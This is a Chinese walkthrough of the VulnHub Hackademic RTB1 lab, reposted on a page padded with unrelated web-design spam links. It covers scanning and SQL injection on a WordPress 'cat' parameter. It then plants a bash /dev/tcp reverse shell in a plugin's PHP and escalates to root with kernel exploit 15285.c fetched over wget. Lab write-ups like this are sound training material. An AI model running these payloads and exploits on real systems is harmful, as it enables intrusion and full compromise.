当前位置: 首页 > news >正文

广东企业网站建设哪家好wordpress优化公司

广东企业网站建设哪家好,wordpress优化公司,绍兴做网站哪家好,个人网站备案麻烦靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip 一、主机探测和端口扫描 nmap 192.168.121.0/24 ip:192.168.121.196 端口:22、80 二、访问80端口 发现target可点击 点击后跳转,页面提示目标是读取到 key.txt 文件 fin…

靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

一、主机探测和端口扫描

nmap 192.168.121.0/24

ip:192.168.121.196

端口:22、80

二、访问80端口

发现target可点击

点击后跳转,页面提示目标是读取到 key.txt 文件

findsomething插件 查看网站的js接口

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

三、目录扫描

dirb http://192.168.121.196/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

wpscan --url  http://192.168.121.196

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

cewl 192.168.121.196 -w pass.txt

密码未能成功爆破

我们回到findsomething中,发现url中携带参数

可以进行sql注入

首先测cat参数,发现存在sql注入

dump 下数据,获取账号密码

挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析

四、get shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'");

kali开启监听,访问hello.php文件,成功反弹shell

五、提权

使用 python 启用交互式shell

sudo -l

查看当前权限,发现需要密码

查看内核版本

uname -a

搜一下相关版本的提权漏洞

searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

python3 -m http.serverwget http://192.168.121.171:8000/15285.c

进行编译后,执行文件,提权成功

gcc 15285.c -o 15285
./15285

http://www.yayakq.cn/news/572179/

相关文章:

  • 网站建设公开html整个页面添加背景图片
  • 30分钟网站建设教程视频重庆网络策划推广公司
  • 惠州做棋牌网站建设无代码做网站
  • wap免费建站程序html软件官方下载
  • 浙江坤宇建设有限公司 网站医院网站建设 南宁
  • 网站后台报表统计系统关键词名词解释
  • 校园门户网站 建设方案昆明百度小程序
  • 做临床研究在哪个网站注册手机网站弹出层插件有哪些
  • 宜城网站建设哪家好海南三亚做网站
  • 经典企业网站模板建站推广
  • 凡科建设网站图片怎么删除网页制作需要学什么专业
  • 汽车制造网站建设网站面包屑如何做
  • 山西建筑劳务网站网站开发资源网
  • 建设工程教育官方网站Wordpress漂亮免费主题
  • 西安做网站培训广州网络哪家比较好
  • 网站建设优化话术网站图片搜索技术哪里可以做
  • 如何在自己电脑上搭建网站大地seo
  • 青岛网站建设有哪些公司购物网站策划书
  • 个人网站设计作品图片丹东电信网站备案
  • 做网站大概要海口最新通知今天重要消息
  • 厦门网站建设建站中心百度推广个人怎么开户
  • 企业网站seo公司微信红包网站制作
  • 成都网站模板购买做网站简单还是app简单
  • 个人网站怎么做才能值钱海南百度竞价推广
  • 哪里建设网站最好网站建设广告素材
  • 假网站怎么做专门做调查问卷的网站
  • 用spl做网站会展公司
  • 网店推广运营策略asp网站 seo
  • 门户网站开发专业建网站需要什么软件
  • 分销网站制作条件网络小白如何建立个人网站